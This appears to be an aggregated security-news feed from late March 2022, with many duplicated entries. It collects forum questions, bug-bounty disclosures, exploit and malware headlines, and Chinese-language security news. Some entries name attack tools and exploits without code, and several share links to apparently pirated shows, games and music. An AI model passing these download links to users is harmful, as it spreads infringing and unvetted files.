    Hello, Whilst aiming for an entry level business analyst job, I fell into a law enforcement digital forensic role and have remained there for 3 years as a digital forensic analyst. This is my first serious job so I don’t really have experience else where. I do have IT industry certs (none of the majors ones) but no degree. Whilst in this role, I have made a couple extremely minor operational changes (by minor, I mean barely making it to the CV/resume) which has reminded me of my drive for a business analyst type role. My salary is decent for this type of role and is more than what an entry level business analyst role would be. I would be willing to take a small pay cut but from what I’ve seen it would be around a 10k pay cut which I just cannot absorb. Besides the problem mentioned above, if at all possible, how would I transition from this role to a business role e.g. business analyst/design? Has anyone done the same? I considered writing in r/careerguidance but I cannot imagine many people in that subreddit knowing much about LE forensics. submitted by /u/gofigured21 [link] [comments]
    Telephone data collection
    Can someone let me know how I can extract data from landline phones. The data required is phone Records, Phone recording etc submitted by /u/Pepperknowsitall [link] [comments]
    How hard is it to examine iPhones?
    Is it frustrating to have to examine iPhones or any specific model phones? I understand most smartphones use encryption and some claim that most of your data is gone after a reset, but is that really true? I don’t believe any encryption is strong it can probably bypassed. submitted by /u/Ill-Date-1852 [link] [comments]
  • Open

    SecWiki News 2022-03-29 Review
    Fvuln: 一款自动化工具 by ourren 如何通过开源组件实现一套山寨版的 BAB 方案 by ourren 从主流安全开发框架看软件供应链安全保障的落地 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-29 Review
    Fvuln: 一款自动化工具 by ourren 如何通过开源组件实现一套山寨版的 BAB 方案 by ourren 从主流安全开发框架看软件供应链安全保障的落地 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 最快勒索软件4分钟加密53G数据;部分APP存读取剪贴板用户信息
    一种名叫LockBit的勒索软件效率惊人,在四分钟内就加密了一台Windows服务器上的近10万个、约53GB的数据文件。
    Kimsuky 针对加密货币公司与零售行业发起攻击
    Kimsuky 使用加密货币相关信息作为诱饵文件,应该是针对加密货币公司发起的攻击。
    因遭网络攻击,乌克兰电信网络服务暂时中断
    乌克兰电信能够正常运营的服务已跌至俄乌战争前的 13%。
    CISA敦促机构组织对Chrome、Redis漏洞进行修补
    近日,美国网络安全与基础设施安全局(CISA)下令联邦民事机构在未来三周内对谷歌Chrome零日漏洞和Redis的一个重要漏洞进行修补。
    GhostWriter APT组织使用Cobalt Strike Beacon攻击乌克兰的国家实体
    近期,乌克兰CERT-UA发现与白俄罗斯有关的GhostWriter APT组织进行的鱼叉式网络钓鱼活动,该组织通过Cobalt Strike Beacon恶意软件来攻击乌克兰国家实体。这次的网络钓鱼邮件使用名为“Saboteurs.rar”的RAR存档,其中包含RAR存档“Saboteurs 21.03.rar”。第二个存档包含SFX存档“Saboteurs filercs.rar”,专家声称这
    因设备短缺,俄罗斯面临互联网通信危机
    由于缺乏可用电信设备,俄罗斯境内互联网服务即将大规模中断。
    拜登政府发布5.8万亿预算,网络安全预算再次增加
    和2022财年相比,拜登政府再次增加了数十亿的网络安全方面的预算。
    研究发现,早期“三重勒索”软件SunCrypt至今仍然活跃
    作为一种RaaS(勒索软件即服务),SunCrypt在2020年活动猖獗,虽然之后有所沉寂,但根据最新发现,该勒索软件仍不时处于活跃状态。
    Gartner发布《中国云安全市场概览》:细看云安全发展如何进入黄金时代
    Gartner预计,到2024年,中国终端用户在系统基础设施和基础设施软件上的支出将有近40%转移到云服务支出。
  • Open

    1-13 of Spongebob Squarepants, 3 movies and Kamp Koral and Patrick Star show
    https://drive.google.com/drive/folders/12kw4rOnqnyj0vNF8SOfQZZpI9HLfzqkl submitted by /u/LateDream [link] [comments]
  • Open

    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Five
    I've decided to continue the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four" blog post series and I've decided to issue yet another update in terms of currently active ransomware themed personal email address accounts.Sample list of currently active ransomware themed email address accounts includes:restorealldata@
  • Open

    黑客利用钓鱼邮件来分发 IcedID 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ 这篇文章描述了 Intezer 研究小组发现的一个新的攻击活动的技术分析,黑客通过一个钓鱼邮件发起攻击,利用会话劫持来传输 IcedID。 地下经济不断演变,攻击者专攻特...
  • Open

    黑客利用钓鱼邮件来分发 IcedID 恶意软件
    译者:知道创宇404实验室翻译组 原文链接:https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ 这篇文章描述了 Intezer 研究小组发现的一个新的攻击活动的技术分析,黑客通过一个钓鱼邮件发起攻击,利用会话劫持来传输 IcedID。 地下经济不断演变,攻击者专攻特...

  • Open

    Computer Science or Cyber Security degree?
    Hey everyone, I'm in high school right now, and am 100% sure I want to work with computers, and like 80% sure I want to work in cybersec. Should I go for a cyber security degree or computer science? submitted by /u/OpBanana1 [link] [comments]
    Web app pentesting technical tutorials/checklists
    Hi! I was wondering if anyone knew any resources (website guides, books) for pentesting web apps, with specific examples of how they're done with modern (or somewhat modern) tools? I see a lot of checklists about what to test but not really how to test them or they mention how to test them at a high level. There's youtube videos and stuff but I was hoping there was a centralized resource that was more in text, but if there's a good playlist of youtube videos then that's cool too! Thanks! submitted by /u/Epsi0 [link] [comments]
    Server Internet access - block by default?
    What is the opinion these days of blocking internet access from servers that don't need it? We use local patch management and almos all of our services are internal. We've been breached (before I started) multiple times, and are using geoblocking for both inbound and outbound traffic. Just wondering if it really makes a difference. submitted by /u/brettfk [link] [comments]
    Is my pentest report ok?
    Hello, my name is Fred. I’m ethical pentester and hacker. Top 1000 THM & HTB. I just did a NMAP and a Nessus. I don’t have time to write a report - can i just give the customer my Nessus scan pentest report? submitted by /u/mrdeadbeat [link] [comments]
    Tracking vulnerabilities for non-technical staff
    What is the best way to track the remediation of vulnerabilities (not just discover them)? ​ We use tools like Nessus to discover vulnerabilities, but I'm looking to allow tracking of the process of remediation across multiple non-security teams (such as assigning tasks to sysadmins and allowing project managers to track). I'd like something more auditable than an Excel file sitting on SharePoint... We do have an internal ticketing system, but I feel like there's a better solution out there. submitted by /u/Securivangelist [link] [comments]
  • Open

    Redacted Cartel Custom Approval Logic Bugfix Review
    Summary Continue reading on Immunefi »
    Broadening our Bug Bounty Program: Trust, Security, and Transparency
    We’re expanding our public bug bounty program for Palantir’s software and infrastructure. Continue reading on Palantir Blog »
    Zenlink уклав партнерство з Immunefi і запустив програму пошуку помилок
    Сьогодні 23 березня 2022 року, і ми раді повідомити, що компанія Zenlink уклала партнерство з Immunefi і запустила програму пошуку помилок. Continue reading on Medium »
    Zenlink заключил партнерство с Immunefi и запустил программу по поиску ошибок
    Сегодня 23 марта 2022 года , и мы рады сообщить, что компания Zenlink заключила партнерство с Immunefi и запустила программу по поиску… Continue reading on Medium »
    Use of Default Credentials to Unauthorised Remote Access of Internal Panel of Network Video…
    👨🏼‍💻Discovered by Dnyanesh A. Gawande Continue reading on Medium »
    One-liner Bug Bounty Tips
    A collection of awesome one-liner scripts especially for bug bounty. Continue reading on Medium »
    Google Dork for instant bounties
    Google dorks that’ll get you instant bounties, proven and tested multiple times. Continue reading on Medium »
  • Open

    Ukraine — Point de situation au 29 mars
    Les dernières 24h Continue reading on Medium »
    TryHackMe: OhSINT Room Write-Up (No Answers)
    OhSINT Room Description: “Are you able to use open source intelligence to solve this challenge?” Continue reading on Medium »
    Analyse super le espionage per fonte aperte
    Fonte aperte (in anglo: open source) es un terminologia technic que denota un producto que include un licentia pro usar su codice fonte… Continue reading on Bureau International »
  • Open

    [Patch now!] Multiple Flaws In Azure Allow Remote Code Execution for All
    submitted by /u/GHIDRAdev [link] [comments]
  • Open

    Denial of Service vulnerability in curl when parsing MQTT server response
    curl disclosed a bug submitted by jenny: https://hackerone.com/reports/1521610
    EC2 Takeover at turn.shopify.com
    Shopify disclosed a bug submitted by 0xd0m7: https://hackerone.com/reports/1295497 - Bounty: $500
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability [pdf]
    Article URL: https://www.ipcc.ch/report/ar6/wg2/downloads/report/IPCC_AR6_WGII_SummaryForPolicymakers.pdf Comments URL: https://news.ycombinator.com/item?id=30834777 Points: 2 # Comments: 0
    Critical Sophos Firewall vulnerability allows remote code execution
    Article URL: https://www.bleepingcomputer.com/news/security/critical-sophos-firewall-vulnerability-allows-remote-code-execution/ Comments URL: https://news.ycombinator.com/item?id=30830479 Points: 2 # Comments: 0
  • Open

    Popcap + GameHouse games installers
    https://drive.google.com/drive/folders/1_3uk_FxyOfxJhmi79vHkseyrwhl5NaQj?fbclid=IwAR3XO8GsSlrK-ii_hgKiYPnbIUkhb5p97xraZ-lATGa9zYDn8HWdqw8lubc submitted by /u/baconpancakesboii [link] [comments]
    Large archive
    http://136.35.236.43/shared/ submitted by /u/ilikemacsalot [link] [comments]
    LLOD 03-27-22 (Large List Of Open Directories)
    http://techmedic.us/d/ http://sdfox7.com/win95/ http://sdfox7.com/netscape/ http://sdfox7.com/macppc/ https://mactorrents.io/wp-content/uploads/ http://51.15.171.201/141/ http://www.mac-torrent-download.net/wp-content/uploads/ http://www.vfxhq.com/overflow/macaddict/ http://www.newlaunches.com/entry_images/ https://download.panic.com/ http://hl.udogs.net/files/ https://mc68000.org/downloads/ https://defhoboz.biz/ http://freeware.epsc.wustl.edu/ http://www.sfu.ca/person/dearmond/322/ http://ccp14.cryst.bbk.ac.uk/ccp/ http://gentoo.mirror.beocat.ksu.edu/portage/app-arch/stuffit/ http://ftpmirror.your.org/ https://soft.uclv.edu.cu/isos/MacOS/MAC%20Leopard/Utiles/ http://baby.indstate.edu/msattler/ https://www.w3.org/History/ https://ftp.swin.edu.au/ https://www.ifarchive.org/if-archive/ http://wreckcenter.com/68k/ ​ ​ ​ Extra random image: http://www.newlaunches.com/entry_images/260805/battery.bmp submitted by /u/ilikemacsalot [link] [comments]
  • Open

    CVE-2022-0995 exploit - heap out-of-bounds write in the watch_queue Linux kernel component
    submitted by /u/0xdea [link] [comments]
    CVE-2022-27666: Exploit esp6 modules in Linux kernel
    submitted by /u/0xdea [link] [comments]
    LDAP relays for initial foothold in dire situations
    submitted by /u/AlmondOffSec [link] [comments]
    New Suncrypt ransomware discovered with added capabilities
    submitted by /u/woja111 [link] [comments]
    OPNSense Firewall Bypass with Carp
    submitted by /u/oherrala [link] [comments]
    Google Issues Urgent Chrome Update to Patch Actively Exploited Zero-Day Vulnerability. CVE-2022-1096 is the second zero-day vulnerability addressed by Google in Chrome since the start of the year.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Four
    For you there's no such thing as a link you can click on? Guess what? I won't tell you. Guess what again? The word is this - a basic link which you're forbidden from clicking on it. It's called the "The Twilight Zone". Good luck in living there and don't forget to spend the rest of your time watching the Outer Limits. You wish!Related posts:Courtesy of Republic of Bulgaria! - Part ThreeCourtesy
  • Open

    SecWiki News 2022-03-28 Review
    OpenCTI入门笔记(二):存储设置&清理&修改图标和title by ourren CodeCat:一款功能强大的静态代码分析工具 by ourren 攻防对抗模拟工具CyberBattleSim的简单分析 by ourren 如何学习这么多的安全文章(理论篇) by ourren 护网相关知识整理 by ourren 数字货币在暗网中的使用初探 by ourren eCapture:无需CA证书抓https网络明文通讯 by ourren 俄乌网络战争的启示 by ourren 我们能从日本保障东京奥运会网络安全工作中学到什么? by Avenger SecWiki周刊(第421期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-28 Review
    OpenCTI入门笔记(二):存储设置&清理&修改图标和title by ourren CodeCat:一款功能强大的静态代码分析工具 by ourren 攻防对抗模拟工具CyberBattleSim的简单分析 by ourren 如何学习这么多的安全文章(理论篇) by ourren 护网相关知识整理 by ourren 数字货币在暗网中的使用初探 by ourren eCapture:无需CA证书抓https网络明文通讯 by ourren 俄乌网络战争的启示 by ourren 我们能从日本保障东京奥运会网络安全工作中学到什么? by Avenger SecWiki周刊(第421期) by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 |英国内勒索攻击2021年内激增100%;美国欧盟同意重开跨大西洋数据流动
    根据一项最新分析,在2020年至2021年疫情期间,向英国数据保护监管机构报告的勒索软件攻击数量增加了一倍多。
    Anonymous泄露从俄罗斯央行窃取的28GB数据
    日前,Anonymous组织已通过其推特账号(@Thblckrbbtworld)向外披露了28GB被盗的数据。
    美国FCC将卡巴斯基、中国电信和中国移动加入国家安全威胁名单
    卡巴斯基和中国驻华盛顿大使馆均已对此做出了回应。
    Chrome 最新零日漏洞已得到修复
    Chrome 浏览器紧急更新,修复了一个零日漏洞。
    Sophos防火墙受到一个严重的身份验证绕过漏洞影响
    近期,Sophos修复了位于Sophos防火墙的用户门户和Webadmin区域的身份验证绕过漏洞,该漏洞被标记为CVE-2022-1040。CVE-2022-1040漏洞的CVSS得分为9.8,它影响了Sophos Firewall版本18.5 MR3 (18.5.3)及更早版本。在Sophos近期更新的一则公告中,称Sophos防火墙在用户门户和Webadmin中发现了该允许远程执行代码的身份验
  • Open

    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    网络空间视角下的哈萨克斯坦动乱
    作者:知道创宇404实验室 原文下载:知道创宇404实验室网络空间视角下的哈萨克斯坦动乱.pdf 一、背景介绍 2022年伊始,哈萨克斯坦西部石油重镇扎瑙津爆发抗议活动,随后迅速蔓延到包括阿拉木图在内的其他城市。抗议从抵制液化石油气价格飙升逐渐发展为暴力骚乱。部分示威者甚至闯进前首都阿拉木图政府,阿拉木图市政府和检察院遭纵火。但随着集体安全条约组织成员国向哈萨克斯坦派遣军队提供援助,哈萨克斯...
    Linux_Kernel 保护机制绕过
    作者:时钟@RainSec 原文链接:https://mp.weixin.qq.com/s/gSTbXW6M72QYtVPoZswhyw 前言 好久没搞kernel的洞了,最近分析的这方面的洞有点多,相关的Exp任务也比较多,因此学习总结一下方便查找和记忆。 SMEP + KPTI bypass SMEP是SupervisorModeExecutionPrevention的缩写,主要的作用其...
    Go-fuzz 解析和思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org go-fuzz Go-fuzz的原理很多都是基于AFL,这里只分析了一些它独特的地方,收获很多,也希望可以和大家交流,如有分析错误还望交流指正。 go-fuzz是google开源的一款go语言fuzz框架,它和AFL很大的一个不同是在于,...
    Arkei 变种:从 Vidar 到 Mars Stealer
    译者:知道创宇404实验室翻译组 原文链接:https://isc.sans.edu/diary/rss/28468 引入 2018年的某个时候,一个名叫 Vidar 的信息窃取软件出现了。分析显示 Vidar 是Arkei 恶意软件的翻版 。从那时起,Vidar 也启发了其他基于 arkei 的变种。今天的文章回顾了 Vidar 和另外两个变种: Oski Stealer 和 Mars S...
  • Open

    网络空间视角下的哈萨克斯坦动乱
    作者:知道创宇404实验室 原文下载:知道创宇404实验室网络空间视角下的哈萨克斯坦动乱.pdf 一、背景介绍 2022年伊始,哈萨克斯坦西部石油重镇扎瑙津爆发抗议活动,随后迅速蔓延到包括阿拉木图在内的其他城市。抗议从抵制液化石油气价格飙升逐渐发展为暴力骚乱。部分示威者甚至闯进前首都阿拉木图政府,阿拉木图市政府和检察院遭纵火。但随着集体安全条约组织成员国向哈萨克斯坦派遣军队提供援助,哈萨克斯...
    Linux_Kernel 保护机制绕过
    作者:时钟@RainSec 原文链接:https://mp.weixin.qq.com/s/gSTbXW6M72QYtVPoZswhyw 前言 好久没搞kernel的洞了,最近分析的这方面的洞有点多,相关的Exp任务也比较多,因此学习总结一下方便查找和记忆。 SMEP + KPTI bypass SMEP是SupervisorModeExecutionPrevention的缩写,主要的作用其...
    Go-fuzz 解析和思考
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org go-fuzz Go-fuzz的原理很多都是基于AFL,这里只分析了一些它独特的地方,收获很多,也希望可以和大家交流,如有分析错误还望交流指正。 go-fuzz是google开源的一款go语言fuzz框架,它和AFL很大的一个不同是在于,...
    Arkei 变种:从 Vidar 到 Mars Stealer
    译者:知道创宇404实验室翻译组 原文链接:https://isc.sans.edu/diary/rss/28468 引入 2018年的某个时候,一个名叫 Vidar 的信息窃取软件出现了。分析显示 Vidar 是Arkei 恶意软件的翻版 。从那时起,Vidar 也启发了其他基于 arkei 的变种。今天的文章回顾了 Vidar 和另外两个变种: Oski Stealer 和 Mars S...
  • Open

    Intigriti’s March XSS Challenge By BrunoModificato
    This month’s challenge was a bit tricky, but still fun nonetheless. The main goal is to bypass CSP protection in a way that is not… Continue reading on Medium »
  • Open

    Sans Sift vs CSI Linux
    Hi Team, I just have a quick question from you. In your opinion, what are the similarities and differences of sans sift workstation and CSI Linux submitted by /u/bankshot15 [link] [comments]

  • Open

    SELECTING OSINT SERVICES FROM CYBER GRANDFATHER!
    https://t.me/BrainHaking2_0ENG/53 Continue reading on Medium »
    Ukraine — Point de situation au 28 mars
    Les dernières 24h Continue reading on Medium »
    SPY NEWS: 2022 — Week 12
    Summary of the espionage-related news stories for the Week 12 (20–26 March) of 2022. Continue reading on Medium »
  • Open

    meobrute - Automate the process of brute forcing the My Eyes Only pin code on Snapchat
    submitted by /u/rushedcar [link] [comments]
    Pulling user data from Iphone data
    Device Iphone 5c Build 13e237 I have scraped the serial and IMEI and I have the device name however with a barebones phone without any apps having been used is there a location to pull the owners registered information without access to the Sim? submitted by /u/CoreRun [link] [comments]
  • Open

    Able to steal bearer token from deep link
    Basecamp disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1372667 - Bounty: $6337
  • Open

    Have there ever been audits of Google Authenticator to confirm that Google cannot read your 2FA codes?
    Google's entire business model revolves around collecting user data and has a confirmed history of working with authorities to monitor individuals in the US and abroad. Google Authenticator app is also the most popular 2FA that exists presently. Has anyone in the NetSec community confirmed that Google does not collect 2FA information from the app and store the seed needed to generate codes on its servers? submitted by /u/JamieOvechkin [link] [comments]
    questions from WAHH?
    There are some lab URLs mentioned in the book http://mdsec/xyz/1837 like this....but these are not live.. My question is has anyone solved those in the past and how are the labs on the portswigger academy as compared to those? submitted by /u/Dry-Brilliant3087 [link] [comments]
    Virtual Machines
    Are the abilities of a computer being used in a botnet, bottlenecked in any when being ran through a VM? submitted by /u/satellitesatan [link] [comments]
  • Open

    Solution to my $20 egg hunt (Part 3)
    My latest article gave a significant hint towards solving the $20 challenge. This one will help you a few steps further… Continue reading on Medium »
  • Open

    Lateral Movement: Remote Services (Mitre:T1021)
    Introduction During Red Team assessments, after a compromise has been done, attackers tend to laterally move through the network gaining more relevant information on other The post Lateral Movement: Remote Services (Mitre:T1021) appeared first on Hacking Articles.
    Lateral Movement: Remote Services (Mitre:T1021)
    Introduction During Red Team assessments, after a compromise has been done, attackers tend to laterally move through the network gaining more relevant information on other The post Lateral Movement: Remote Services (Mitre:T1021) appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-03-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Scheduled Tasks and Batteries
    Krzysztof shared another blog post recently, this one that addresses the battery use and the battery level of a system, and how it applies to an investigation. At first thought, I'm sure a lot of you are asking, "wait...what?", but think about it for a moment. Given the pandemic, a lot of folks are working remote...a LOT. There are a number of firms that are international, with offices in a lot of different countries all over the world, and a great many of those folks are working remotely. Yes, we've always had remote workers and folks working outside of office environments, but the past 2+ years have seen something of a forced explosion in remote workers. Those remote workers are using laptops. And it's likely that they're not always connected to a power supply; that is, there will be tim…
  • Open

    FreeBuf早报 | 雀巢称数据系自己泄露非匿名者窃取;美将中国电信等列入安全威胁名单
    当地时间 3 月 25 日,美国联邦通信委员会 FCC 将中国电信(美洲)公司、中国移动(美国)、卡巴斯基等公司加入了对美国国家安全构成威胁的通信设备和服务提供商名单。
  • Open

    Introduction to CSRF: How can a cookie get you hacked
    submitted by /u/gooldopt [link] [comments]
  • Open

    flying spaghetti monster
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Since they'll be in the news following Taylor Hawkins death.
    https://www.ashleecadell.com/xyzstorelibrary/Foo%20Fighters/ yes - I am aware the parent directory has been posted recently. http://pitofdespair.randominsanity.org/music/Luna/Foo%20Fighters/ http://109.120.203.163/Music/grunge/Foo%20Fighters/ ditto for this one submitted by /u/ringofyre [link] [comments]
  • Open

    Real talk
    submitted by /u/DrinkMoreCodeMore [link] [comments]

  • Open

    oss-security - Re: zlib memory corruption on deflate (i.e. compress)
    submitted by /u/Gallus [link] [comments]
    PHP filter_var shenanigans
    submitted by /u/Gallus [link] [comments]
    Mining data from Cobalt Strike beacons
    submitted by /u/digicat [link] [comments]
    Using the Dirty Pipe Vulnerability to Break Out from Containers
    submitted by /u/freakwin [link] [comments]
  • Open

    Ukraine — Point de situation au 26 mars
    Les dernières 24h Continue reading on Medium »
    Ukraine — Point de situation au 26 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    CVE-2022-1096: Type Confusion in V8, exploit exists in the wild
    Article URL: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html Comments URL: https://news.ycombinator.com/item?id=30814231 Points: 2 # Comments: 0
    Chrome 0day is being exploited now for CVE-2022-1096; update immediately
    Article URL: https://www.forbes.com/sites/daveywinder/2022/03/26/google-confirms-emergency-security-update-for-32-billion-chrome-users-attacks-underway/ Comments URL: https://news.ycombinator.com/item?id=30813779 Points: 257 # Comments: 141
  • Open

    【安全通报】Spring Cloud Function SPEL 远程命令执行漏洞
    近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL表达式注入漏洞,该漏洞可通过对 SPEL表达式进行注入从而引发远程命令执行。
  • Open

    【安全通报】Spring Cloud Function SPEL 远程命令执行漏洞
    近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL表达式注入漏洞,该漏洞可通过对 SPEL表达式进行注入从而引发远程命令执行。
  • Open

    OTP reflecting in response sensitive data exposure leads to account take over
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1318087
    No Rate Limit on forgot password page
    UPchieve disclosed a bug submitted by pranto_0: https://hackerone.com/reports/1317494
    Password reset token leakage
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354437
    Missing Validation in editing "Your Phone Number"
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354368
    Password Reuse
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354382
    Outdated Copyright Message @ Welcome email
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354444
    No rate Limit on Password Reset page on upchieve
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1320138
    Clickjacking login page of https://hackers.upchieve.org/login
    UPchieve disclosed a bug submitted by sara346: https://hackerone.com/reports/1331485
    No Rate Limiting for Password Reset Email Leads to Email Flooding
    UPchieve disclosed a bug submitted by bd10ceb041a5297f881137c: https://hackerone.com/reports/1340650
  • Open

    Using the Dirty Pipe Vulnerability to Break Out from Containers
    Article URL: https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/ Comments URL: https://news.ycombinator.com/item?id=30813614 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-03-26 Review
    利用开源情报发现并解释恶意行为 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-26 Review
    利用开源情报发现并解释恶意行为 by ourren 更多最新文章,请访问SecWiki
  • Open

    漏洞情报 | Spring Cloud Function SPEL表达式注入漏洞通报
    近日,Spring Cloud Function官方测试版本通报了一个有关Spring Cloud Function SPEL表达式注入漏洞。利用该漏洞,不法分子可通过特殊配置SPEL表达式注入的方式在远程执行注入攻击。鉴于Spring Cloud Function相关组件应用范围有限,另外该漏洞我无法在默认配置情况下出发,因此实际危害不会太高。FreeBuf将该漏洞等级评委「中危」。漏洞描述:S
  • Open

    Stuxnet worm | The world's first digital weapon
    submitted by /u/OkFaithlessness2414 [link] [comments]
  • Open

    pictures from a monster raving loony candidate
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    ToolsRus CTF — Writeup
    In this CTF we have multiple tools we’ll use to enumerate, exploit to gain access and then catch a shell to capture the flag. Continue reading on Medium »
    Cybersecurity Adventure
    This blog will be a way for me to share with you my journey through cybersecurity. I will do this by creating walkthroughs ranging from… Continue reading on Medium »
  • Open

    Reverse Engineering Fortinet Fortigate Devices
    I want to view the traffic between a FortiGate device and the Fortinet APIs (where fortinet gets updates, threat intelligence, etc). Ive got a VM of FortiGate and I've got it proxying traffic via Burpsuite. I'm fairly sure that the FortiGate device has SSL pinning enabled, because despite adding my CA cert, I still can't see the traffic. Questions, how would I gain root on this device? Secondly, how would I remove the SSL Pinning or replace the cert? submitted by /u/danchuckaway27 [link] [comments]
    Recommendation
    Currently my supervisor ask me to check Acunetix and Qualys (I dont use this before), any recommendation why I will recommend acunetix over qualys and vice versa? Thank you I prefer the Acunetix because the company is using PHP, the interface of Acunetix and the ease of use of it. submitted by /u/pldc_bulok [link] [comments]
    Malicious email tools in O365
    Can someone point me to the best education/information on how to properly use all tools available for security around O365 email? submitted by /u/rogueit [link] [comments]
    Outlook gives "site security cert invalid" message, further viewing shows weirdness?
    Hi all, I use Office365, and have Outlook installed on my W10 machine. Have operated this way for years. I am have some basic infosec knowledge, at least to the point where I know what to avoid and what steps to take to keep myself somewhat secure. From time to time a message pops up in Outlook telling me that a site security cert has a problem. Normally I just ignore it, but today decided to look into it further. When I view the certificate details, the thing that popped out to me was a Huawei email address. Screenshots Now I think I'm just being curious/paranoid, but figured I'd ask cause at the least I'd get a better understanding of what's happening. Am I right in thinking that this relates to a particular email message containing content that's hosted somewhere and that's what Outlook is hesitant to access? Or does this relate to something else? Rather than this being the CCP having broken into my house, installed a custom CPU containing embedded backdoor access into my decade old gaming rig, I would think that this then probably relates more to major back-end backbone infrastructure stuff, which Huawei does a lot of, so is probably more along those lines? Any info appreciated. p.s. don't need to be told to use different email/PC/internet/security/OS, but I understand it's a natural reflex many of you can't control :D submitted by /u/JForce1 [link] [comments]

  • Open

    Enhance Network security skills advice ?
    Hello , i am currently a rising senior going to graduate with Management of info. Systems B.S. and iam very interested in cybersecurity. I’ve been studying for S+ & N+ and that has helped my cyber knowledge tremendously. I was wondering how can enhance my skills? I want to join a red team for a big company. Any tips on how to perform penetration tests? How to perform network scans? And how to look for vulnerabilities? What software do i need ? Ive been trying to use kali linux but its so hard to download on mac . Any tips ? Ik most of the basic cybersecurity knowledge, i just want to apply it and practice! submitted by /u/AffectionateDot4877 [link] [comments]
    Tests to run on a raspberry på lora protocol
    Hi, I have a very general inspiration problem. I'm currently doing my msc thesís. We are implementing a protocol (kinda like the signal one) for lora networks. We have the protocol implemented in rust, and the plan was to put in onto a constrained device that we had found, and then measure the power consumption of the protocol. We have run into a roadblock though, the devices we had in mind are incompatible with the lora resource we have at hand. SO now, we're putting the project on a raspberry pi instead. This kinda ruins the whole idea with reading the power usage of the device, since the raspberry pi consumes so much power, that power readings won't really make much sense. ​ So what I want to ask the creatives minds of asknetsec, is if anyone can think of any measurements, or interesting academic experiments that one could do with the raspberry pi? checking security properties in some way or something? or is there a cool way of measuring power on a raspberry pi, that can abstract away some of the operations that the pi does usually? submitted by /u/GarseBo [link] [comments]
    OWASP ZAP with google authentication?
    Can I run OWASP ZAP on a webapp that uses google authentication? or provide it a cookie from a browser that is already authenticated to said app? I can't find anything about google authentication in the documentation. submitted by /u/Individual-Quarter47 [link] [comments]
    Looking for insight/experience on PAM solutions from an offensive perspective
    Hello, As the title says, I'm trying to gather some insight to PAMs (such as Thycotic and CyberArk) from the perspective of red teamers/pentesters. Google hasn't turned up much in the way of blogs or writeups. Our company is in talks with a vendor to implement this type of software, and I'm not seeing eye-to-eye with the reps. They claim it will mitigate most common AD attacks against privileged accounts, but I'm struggling to see how exactly it will mitigate attacks such as PtH and forging tickets. Understandably, it will make it harder to capture a hash and cut down on persistence if the passwords are regularly rotated, but it certainly doesn't make it impossible (or even improbable) to execute these traditional attacks. So, if anyone has any first hand experience or a link to a good blog/writeup, I would be very appreciative. In addition, with consideration to what I've asked, I also welcome your opinion on 'is it worth it'. Thank you in advance. submitted by /u/GrandWheel50 [link] [comments]
    education pathing advice
    I just completed my bachelor's with a concentration in cybersecurity. My current company reorganized, I got rehired, but am not where I'd like to be. While exploring entry level infosec jobs during reorg (internal and external), most roles wanted either more experience or more certs. (I have IT support, analyst, and leadership experience - no SOC or security or compliance analyst roles). I currently only have CompTIA A+, Net+, Sec+. My current employer offers tuition assistance 8k/year with no degree cap. Does it make sense to get a masters from WGU with two EC council certifications (approximately 2 years on tuition assistance, and potentially finishing early with scholarship opportunities) OR a bachelor's of applied cybersecurity from SANS institute with 9 GIAC certs and an internship at the internet storm center (approximately 4 years with tuition assistance/no loans) loans/extra financial responsibility needs to be avoided as I'm a single parent about to need to help my child with college in 2 years which is a big determining factor in speed of completion due to funding. submitted by /u/GestahlianSociety [link] [comments]
    Submitted a bug/vulnerability/exploit to Apple but they wont Pay me ?
    More like a exploit / vulnerability that gains full disk access to the System if you have physical access to the machine...This is working on the latest Monterey OS, all i got from Apple was a thank you for working with our team and no reward, after submitting alot of information,files,and videos etc demonstrating how it works.??? anyone else had this happen ??????? i feel like i got robbed. and the worst thing about it is, i could've sold the exploit to another bugBounty website..... the website states $ 100,000-$200,000 for this type of exploit.... https://developer.apple.com/security-bounty/ submitted by /u/0sculum3stm0rtis [link] [comments]
  • Open

    How to detect IMSI catchers
    submitted by /u/knoy [link] [comments]
    Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer
